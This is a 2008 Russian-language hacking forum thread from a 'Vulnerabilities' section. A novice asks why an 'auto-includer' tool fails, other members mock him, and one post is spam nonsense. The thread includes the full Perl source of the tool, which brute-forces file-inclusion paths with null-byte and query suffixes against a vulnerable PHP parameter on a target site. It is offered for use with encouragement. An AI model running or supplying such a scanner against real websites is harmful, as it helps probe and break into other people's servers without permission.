Автоинклудер

Discussion in 'Уязвимости' started by Велемир, 13 Jun 2008.

Thread Status:
Not open for further replies.
  1. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Почему не работает ?
     
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Луна не в той фазе. Задай нормально вопрос, мы тут не телепаты)
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Гггггггггггг)).Да просто сделал как написано - ввёл путь до уязвимого параметра в скрипте сайта и вбил ентер:Р.И опять возвращает суко в С:\Автоинклудер (эт папка где он лежит =_=)
     
  4. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Велемир, ты покажи что за скрипт! Я не телепат ещё раз говорю.
     
  5. dushq

    dushq Banned

    Joined:
    12 Jun 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    сирень голубая потомучто по небу слоны топчатся и суки не убирают за собой когда дадя вася спит на лавочке возле ментовки.
     
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    #!/usr/bin/perl
    use LWP::UserAgent;

    if (@ARGV < 1) {&usage(); exit();}

    $|=1;

    $timeout = 0;
    $log_inc = 'all_links.txt';

    $host = $ARGV[0]; # сервак
    $search = 'GET';
    #$search = 'ServerRoot';

    @ends = ('%00','?','');

    open PATH,$log_inc;
    @paths=<PATH>;
    close PATH;

    foreach $end (@ends) {
    foreach $path (@paths) {
    chomp($path);
    print "\r\nTry ".$path.$end."... ";
    $answer = &query();
    if($answer ne "not_find"){print "YES!!!\r\n\r\n=========================\r\n\r\n$answer\r\n\r\n=========================";}
    else{print "NO";}
    }
    }

    sub query()
    {
    #print "\r\n".$host.$path.$end."\r\n";
    $sock = LWP::UserAgent->new(timeout=>$timeout);
    $res = $sock->get($host.$path.$end,'USER_AGENT'=>'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    if($res->is_success)
    {
    if($res->as_string =~ /$search/) { return $host.$path.$end; } else {return "not_find";}
    }
    else{return "not_find";}
    }


    sub usage()
    {
    print "
    Vulnerability auto-includer

    Usage: auto_includer.pl http://site/path_to/page.php=

    "
    }

    Дерзайте )
     
  7. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Ты уверен что инклюд есть?
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Хз,это мол прога Автоинклудер,которая валялась в аттаче на форуме.А есь норм инклудеры или самому писать?))))))))
     
  9. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    ещё один... млять.. долбаные каникулы.... еслиб с помощью этого скрипта можно было бы инклюдеть на любом сайте то был бы ХАОС... чтоб его использовать нада проверить уязвим ли сайт ... уху ... а теперь спать
     
  10. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    не хочу.
     
Thread Status:
Not open for further replies.